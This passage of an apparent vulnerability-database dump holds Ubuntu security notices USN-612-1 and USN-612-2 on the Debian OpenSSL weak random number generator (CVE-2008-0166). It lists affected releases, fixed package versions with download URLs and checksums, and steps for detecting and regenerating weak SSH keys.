Ubuntu systems. As a result of this\r\nweakness, certain encryption keys are much more common than they\r\nshould be, such that an attacker could guess the key through a\r\nbrute-force attack given minimal knowledge of the system. This\r\nparticularly affects the use of encryption keys in OpenSSH, OpenVPN\r\nand SSL certificates.\r\n\r\nThis vulnerability only affects operating systems which (like\r\nUbuntu) are based on Debian. However, other systems can be\r\nindirectly affected if weak keys are imported into them.\r\n\r\nWe consider this an extremely serious vulnerability, and urge all\r\nusers to act immediately to secure their systems. (CVE-2008-0166)\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\n== Who is affected ==\r\n\r\nSystems which are running any of the following releases:\r\n\r\n * Ubuntu 7.04 (Feisty)\r\n * Ubuntu 7.10 (Gutsy)\r\n * Ubuntu 8.04 LTS (Hardy)\r\n * Ubuntu "Intrepid Ibex" (development): libssl <= 0.9.8g-8\r\n * Debian 4.0 (etch) (see corresponding Debian security advisory)\r\n\r\nand have openssh-server installed or have been used to create an\r\nOpenSSH key or X.509 (SSL) certificate.\r\n\r\nAll OpenSSH and X.509 keys generated on such systems must be\r\nconsidered untrustworthy, regardless of the system on which they\r\nare used, even after the update has been applied.\r\n\r\nThis includes the automatically generated host keys used by OpenSSH,\r\nwhich are the basis for its server spoofing and man-in-the-middle\r\nprotection.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 7.04:\r\n libssl0.9.8 0.9.8c-4ubuntu0.3\r\n\r\nUbuntu 7.10:\r\n libssl0.9.8 0.9.8e-5ubuntu3.2\r\n\r\nUbuntu 8.04 LTS:\r\n libssl0.9.8 0.9.8g-4ubuntu3.1\r\n\r\n\r\nUpdated packages for Ubuntu 7.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8c-4ubuntu0.3.diff.gz\r\n Size/MD5: 55960 f1528622672403589e0d3aac4091e3b7\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8c-4ubuntu0.3.dsc\r\n Size/MD5: 899 24ce07dd1372b34976caa4e703b48254\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8c.orig.tar.gz\r\n Size/MD5: 3313857 78454bec556bcb4c45129428a766c886\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4ubuntu0.3_amd64.udeb\r\n Size/MD5: 604324 c67285c8c9831d7d688930bf3403070e\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8c-4ubuntu0.3_amd64.deb\r\n Size/MD5: 2186920 ebfec7f633c445ae170b06acb039175c\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4ubuntu0.3_amd64.deb\r\n Size/MD5: 1645270 3c37713de4ad97e6eb675f9f8a9b3ddd\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8c-4ubuntu0.3_amd64.deb\r\n Size/MD5: 918170 c282b7478265a81019e771a382ec99cd\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8c-4ubuntu0.3_amd64.deb\r\n Size/MD5: 1006504 a199460e3209b03f454afa205abbd979\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4ubuntu0.3_i386.udeb\r\n Size/MD5: 569520 9441a49f438e5c0c77c70f9c50b3acee\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8c-4ubuntu0.3_i386.deb\r\n Size/MD5: 2068628 152dc5bd9d6edb669be2a4d88fdc9126\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4ubuntu0.3_i386.deb\r\n Size/MD5: 5499922 4e07a86c1f4930411fffc25cb330f683\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8c-4ubuntu0.3_i386.deb\r\n Size/MD5: 2809850 dd17842504c08b5a09e7ec15dee20f8b\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8c-4ubuntu0.3_i386.deb\r\n Size/MD5: 1001316 f823d1e7c4ea63e976fd129a2bfe5fed\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4ubuntu0.3_powerpc.udeb\r\n Size/MD5: 617086 d8158b21c17afbd21460dfee4a001194\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8c-4ubuntu0.3_powerpc.deb\r\n Size/MD5: 2217842 90507ac4c5dce8110853c8e71c366004\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4ubuntu0.3_powerpc.deb\r\n Size/MD5: 1705352 d2ac68501fc799a5033824d204ac0175\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8c-4ubuntu0.3_powerpc.deb\r\n Size/MD5: 939544 1e6af8a9427957566434357f346096d9\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8c-4ubuntu0.3_powerpc.deb\r\n Size/MD5: 1014948 b6c5a7b2c97df56cff30d1797490705f\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4ubuntu0.3_sparc.udeb\r\n Size/MD5: 563014 dd59635ac83a1c84fe59b7d8ab9b2992\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8c-4ubuntu0.3_sparc.deb\r\n Size/MD5: 2111944 e647e97fbb98c2ce48c8fce8517c92d0\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4ubuntu0.3_sparc.deb\r\n Size/MD5: 4053968 b26c15bf44dc732832251f8cb1002b15\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8c-4ubuntu0.3_sparc.deb\r\n Size/MD5: 2205868 0b767362c79d60942cbe473deecad932\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8c-4ubuntu0.3_sparc.deb\r\n Size/MD5: 1016770 f6940cc99ec5b841d4a54b9cb38af203\r\n\r\nUpdated packages for Ubuntu 7.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.2.diff.gz\r\n Size/MD5: 58261 712fb9938545440a484c383c8a6ac7f7\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.2.dsc\r\n Size/MD5: 950 b47e6ac103c4bcc8d969faf994c8a887\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e.orig.tar.gz\r\n Size/MD5: 3341665 3a7ff24f6ea5cd711984722ad654b927\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.2_amd64.udeb\r\n Size/MD5: 608582 4e66d471698d449a31e206d91972ac77\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.2_amd64.deb\r\n Size/MD5: 2065236 eb0982f5fdc2988b4a1adc3535a92cec\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.2_amd64.deb\r\n Size/MD5: 1644030 45659a7dadef747fb828a11bf00b6466\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.2_amd64.deb\r\n Size/MD5: 928852 cbbc47991050e043a259065d6e63d3f1\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.2_amd64.deb\r\n Size/MD5: 877820 d5254e3c81c503be7ec8d908985ca27d\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.2_i386.udeb\r\n Size/MD5: 571794 33ed14cad215235c7f3e3959417e618a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.2_i386.deb\r\n Size/MD5: 1943124 63d90e3f64c213a4033caa78adbb3481\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.2_i386.deb\r\n Size/MD5: 5520470 9ffd3c29c28109498b530d5062d2537a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.2_i386.deb\r\n Size/MD5: 2825460 8265f8e385f34559d74ccca533c02a7a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.2_i386.deb\r\n Size/MD5: 872078 09113bb86f530a81ab0a9ea3cff847cb\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.2_lpia.udeb\r\n Size/MD5: 537248 b14a7de8a4d2dc6c0636bcea065a25d9\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.2_lpia.deb\r\n Size/MD5: 1922036 22e02a08b6042d2037ed82a05cbe5968\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.2_lpia.deb\r\n Size/MD5: 1557052 34ac9b97e2297d773f00ec0cf9e9ed28\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.2_lpia.deb\r\n Size/MD5: 836566 2b357cdf056d2bdfc3d00eef8d758f12\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.2_lpia.deb\r\n Size/MD5: 876586 96f16cd47d93e94dbffb7bd7deb93284\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.2_powerpc.udeb\r\n Size/MD5: 618002 6949577d5d0dff62f1a87843556fce47\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.2_powerpc.deb\r\n Size/MD5: 2093118 d1118570fb10780532a114316870024f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.2_powerpc.deb\r\n Size/MD5: 1704998 06a83dfb0b7463b2e0c48c957ad3e94f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.2_powerpc.deb\r\n Size/MD5: 945758 be53ff03675982367b0615701c0c9012\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.2_powerpc.deb\r\n Size/MD5: 886184 dd98564311d595033534eb7c6f396718\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.2_sparc.udeb\r\n Size/MD5: 565188 0ca872b583b61d0d15a872e83378782d\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.2_sparc.deb\r\n Size/MD5: 1987272 9334f39b64dbc1765bf0b8bc1c5c0113\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.2_sparc.deb\r\n Size/MD5: 4049724 69782f2dbd642b303551e128c1552aa3\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.2_sparc.deb\r\n Size/MD5: 2220894 8ae7f5b7585bd9e4f1392f76fd3bcc71\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.2_sparc.deb\r\n Size/MD5: 887244 d6320a2c885ce0eae7dcc27f569a0963\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.1.diff.gz\r\n Size/MD5: 52455 febf7cb03f479b0a3adcae06eb02203b\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.1.dsc\r\n Size/MD5: 912 0a14742d144c1389dcbc52f47ba3f7c8\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g.orig.tar.gz\r\n Size/MD5: 3354792 acf70a16359bf3658bdfb74bda1c4419\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl-doc_0.9.8g-4ubuntu3.1_all.deb\r\n Size/MD5: 628518 80043d691d2bf742c6874b237ed659c6\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.1_amd64.udeb\r\n Size/MD5: 603886 e1c9837aaa00f00c030be0948f2666f8\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.1_amd64.deb\r\n Size/MD5: 2064554 4fd6b7dba2501356363e4c88876e7016\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.1_amd64.deb\r\n Size/MD5: 1603796 877c7dc84a0a442a71322466aaf0191d\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.1_amd64.deb\r\n Size/MD5: 931158 936aeaeb9c0acfa73ce04362ef20f235\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.1_amd64.deb\r\n Size/MD5: 390622 5ece5cbc091a8955ec7dc47b6494c42e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.1_i386.udeb\r\n Size/MD5: 564666 e428bac008437846a9411a34f7e46e8b\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.1_i386.deb\r\n Size/MD5: 1941644 b6edc3acd3a90c42baaf8819fd9f3256\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.1_i386.deb\r\n Size/MD5: 5340876 a1a31e52f2b6ce5b00a2e550e1c9a9f7\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.1_i386.deb\r\n Size/MD5: 2828048 4ef2062996432b694e1a06eaf61818aa\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.1_i386.deb\r\n Size/MD5: 385434 f29998409853097ebe60730295c81e7b\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.1_lpia.udeb\r\n Size/MD5: 535450 2a6c4f477589124df101fdf508bf170d\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.1_lpia.deb\r\n Size/MD5: 1922630 bfe69691602e76835d998443fecf6bf5\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.1_lpia.deb\r\n Size/MD5: 1512332 c90b961b61a02198b87b503d1f7f01ce\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.1_lpia.deb\r\n Size/MD5: 842712 69b457eef0ae45f342e01bd13c83be2d\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.1_lpia.deb\r\n Size/MD5: 390028 41001b11916fd7d522580060ad298d16\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.1_powerpc.udeb\r\n Size/MD5: 610282 8c4ff25d4e5695eba1e0ea6e0fba22b1\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.1_powerpc.deb\r\n Size/MD5: 2077924 35d088aee3c0ed62b9a18d861fca08b9\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.1_powerpc.deb\r\n Size/MD5: 1639052 85d14e648caaaf6fab7acae470d7e1b2\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.1_powerpc.deb\r\n Size/MD5: 944496 3f561d17a732a995c61a99bb58be0348\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.1_powerpc.deb\r\n Size/MD5: 399190 b7cdcf3e46bb497fc0d9f0ebd1e670d2\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.1_sparc.udeb\r\n Size/MD5: 559662 1e68facc899f2a355ffc5ba9d74873fb\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.1_sparc.deb\r\n Size/MD5: 1984618 3d1892e144d9e360091fca9970bac61a\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.1_sparc.deb\r\n Size/MD5: 3873424 769e051711a442675147042e60fa6e3b\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.1_sparc.deb\r\n Size/MD5: 2241226 c21c1ea84171285a241ed7ec31fb2d2d\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.1_sparc.deb\r\n Size/MD5: 397810 31bccc57af7b0dc1dd6d9005bbdedb2c\r\n\r\n", "modified": "2008-05-14T00:00:00", "published": "2008-05-14T00:00:00", "id": "SECURITYVULNS:DOC:19844", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19844", "title": "[USN-612-1] OpenSSL vulnerability", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "description": "Weak random generation in Debian-based distributives (Debian, Ubuntu).", "modified": "2008-05-15T00:00:00", "published": "2008-05-15T00:00:00", "id": "SECURITYVULNS:VULN:8994", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8994", "title": "Linux distributives OpenSSH / OpenSSL weak random generator", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "=========================================================== \r\nUbuntu Security Notice USN-612-2 May 13, 2008\r\nopenssh vulnerability\r\nCVE-2008-0166, http://www.ubuntu.com/usn/usn-612-1\r\n===========================================================\r\n\r\nA weakness has been discovered in the random number generator used\r\nby OpenSSL on Debian and Ubuntu systems. As a result of this\r\nweakness, certain encryption keys are much more common than they\r\nshould be, such that an attacker could guess the key through a\r\nbrute-force attack given minimal knowledge of the system. This\r\nparticularly affects the use of encryption keys in OpenSSH.\r\n\r\nThis vulnerability only affects operating systems which (like\r\nUbuntu) are based on Debian. However, other systems can be\r\nindirectly affected if weak keys are imported into them.\r\n\r\nWe consider this an extremely serious vulnerability, and urge all\r\nusers to act immediately to secure their systems.\r\n\r\nThe following Ubuntu releases are affected:\r\n\r\nUbuntu 7.04\r\nUbuntu 7.10\r\nUbuntu 8.04 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\n\r\nUpdating your system:\r\n\r\n1. Install the security updates\r\n\r\n Ubuntu 7.04:\r\n openssh-client 1:4.3p2-8ubuntu1.3\r\n openssh-server 1:4.3p2-8ubuntu1.3\r\n\r\n Ubuntu 7.10:\r\n openssh-client 1:4.6p1-5ubuntu0.3\r\n openssh-server 1:4.6p1-5ubuntu0.3\r\n\r\n Ubuntu 8.04 LTS:\r\n openssh-client 1:4.7p1-8ubuntu1.1\r\n openssh-server 1:4.7p1-8ubuntu1.1\r\n\r\n Once the update is applied, weak user keys will be automatically\r\n rejected where possible (though they cannot be detected in all\r\n cases). If you are using such keys for user authentication,\r\n they will immediately stop working and will need to be replaced\r\n (see step 3).\r\n\r\n OpenSSH host keys can be automatically regenerated when the\r\n OpenSSH security update is applied. The update will prompt for\r\n confirmation before taking this step.\r\n\r\n2. Update OpenSSH known_hosts files\r\n\r\n The regeneration of host keys will cause a warning to be displayed\r\n when connecting to the system using SSH until the host key is\r\n updated in the known_hosts file. The warning will look like this:\r\n\r\n @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @\r\n @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!\r\n Someone could be eavesdropping on you right now (man-in-the-middle\r\n attack)! It is also possible that the RSA host key has just been\r\n changed.\r\n\r\n In this case, the host key has simply been changed, and you\r\n should update the relevant known_hosts file as indicated in the\r\n error message.\r\n\r\n3. Check all OpenSSH user keys\r\n\r\n The safest course of action is to regenerate all OpenSSH user\r\n keys, except where it can be established to a high degree of\r\n certainty that the key was generated on an unaffected system.\r\n\r\n Check whether your key is affected by running the ssh-vulnkey\r\n tool, included in the security update. By default, ssh-vulnkey\r\n will check the standard location for user keys (~/.ssh/id_rsa,\r\n ~/.ssh/id_dsa and ~/.ssh/identity), your authorized_keys file\r\n (~/.ssh/authorized_keys and ~/.ssh/authorized_keys2), and the\r\n system's host keys (/etc/ssh/ssh_host_dsa_key and\r\n /etc/ssh/ssh_host_rsa_key).\r\n\r\n To check all your own keys, assuming they are in the standard\r\n locations (~/.ssh/id_rsa, ~/.ssh/id_dsa, or ~/.ssh/identity):\r\n\r\n $ ssh-vulnkey\r\n\r\n To check all keys on your system:\r\n\r\n $ sudo ssh-vulnkey -a\r\n\r\n To check a key in a non-standard location:\r\n\r\n $ ssh-vulnkey /path/to/key\r\n\r\n If ssh-vulnkey says "Unknown (no blacklist information)",\r\n then it has no information about whether that key is affected.\r\n If in doubt, destroy the key and generate a new one.\r\n\r\n4. Regenerate any affected user keys\r\n\r\n OpenSSH keys used for user authentication must be manually\r\n regenerated, including those which may have since been\r\n transferred to a different system after being generated.\r\n\r\n New keys can be generated using ssh-keygen, e.g.:\r\n\r\n $ ssh-keygen\r\n Generating public/private rsa key pair.\r\n Enter file in which to save the key (/home/user/.ssh/id_rsa):\r\n Enter passphrase (empty for no passphrase):\r\n Enter same passphrase again:\r\n Your identification has been saved in /home/user/.ssh/id_rsa.\r\n Your public key has been saved in /home/user/.ssh/id_rsa.pub.\r\n The key fingerprint is:\r\n 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 user@host\r\n\r\n5. Update authorized_keys files (if necessary)\r\n\r\n Once the user keys have been regenerated, the relevant public\r\n keys must be propagated to any authorized_keys files on\r\n remote systems. Be sure to delete the affected key.\r\n\r\n\r\nUpdated packages for Ubuntu 7.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-8ubuntu1.3.diff.gz\r\n Size/MD5: 275518 a8b32463625d995f31710932955f155e\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-8ubuntu1.3.dsc\r\n Size/MD5: 1074 2ba8f9d6823e429a87a16d1069b8bcb0\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz\r\n Size/MD5: 920186 239fc801443acaffd4c1f111948ee69c\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.3p2-8ubuntu1.3_all.deb\r\n Size/MD5: 1086 ec4e33a5b72165a213aba1dc5c6e1e48\r\n http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/ssh-krb5_4.3p2-8ubuntu1.3_all.deb\r\n Size/MD5: 93414 1273931c48c521f82a32c83d3c2c7f30\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.3_amd64.udeb\r\n Size/MD5: 173116 a63a1aad1a6d703701353b1a2f3aa3f1\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.3_amd64.deb\r\n Size/MD5: 739306 6ebf534da00e63d36ff8d25d133c5f87\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.3_amd64.udeb\r\n Size/MD5: 185954 165979d39473eed093bd332294611892\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.3_amd64.deb\r\n Size/MD5: 255690 5f273f1e6da9f6f572da970e7ba1680a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.3_amd64.deb\r\n Size/MD5: 101788 18268a8507e35a673ba0b88d7c8f905b\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.3_i386.udeb\r\n Size/MD5: 156814 338d87e0ed113fabb31bf8985c41044d\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.3_i386.deb\r\n Size/MD5: 701434 47f4f9e32772a27f390b7bf598ca692c\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.3_i386.udeb\r\n Size/MD5: 165480 bb943025f0bfb39c0f080aa0c6a90507\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.3_i386.deb\r\n Size/MD5: 238154 cc0df0b6336c02dda018dd381e096150\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.3_i386.deb\r\n Size/MD5: 101494 d84b4274b86d65878b41e33db957cbec\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.3_powerpc.udeb\r\n Size/MD5: 178908 fb39252bf076dca363b34058f6c6280a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.3_powerpc.deb\r\n Size/MD5: 767364 cbe597ba0193d39d115a432404471939\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.3_powerpc.udeb\r\n Size/MD5: 184132 ebc03fba90aa40ba7e86c2bd90b4b43b\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.3_powerpc.deb\r\n Size/MD5: 259734 1feeb20163fb303b41a85bbd9775abe5\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.3_powerpc.deb\r\n Size/MD5: 104262 f781bfd69b35508129c0ce71eb0cf395\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.3_sparc.udeb\r\n Size/MD5: 164240 2796884a4e9c6a0c4d228e3a2d829df4\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.3_sparc.deb\r\n Size/MD5: 751366 43659331cc6f294e7657d96311db221a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.3_sparc.udeb\r\n Size/MD5: 172576 f3bebc7681083a2a7dd4a91fd1ee5237\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.3_sparc.deb\r\n Size/MD5: 263460 913bae4437faf91b7c4b95257ca9fe46\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.3_sparc.deb\r\n Size/MD5: 101742 cf3e2aa66bfe30c2981a28063d7fa639\r\n\r\nUpdated packages for Ubuntu 7.10:\r\n\r\n Source archives:\r\n\r\n 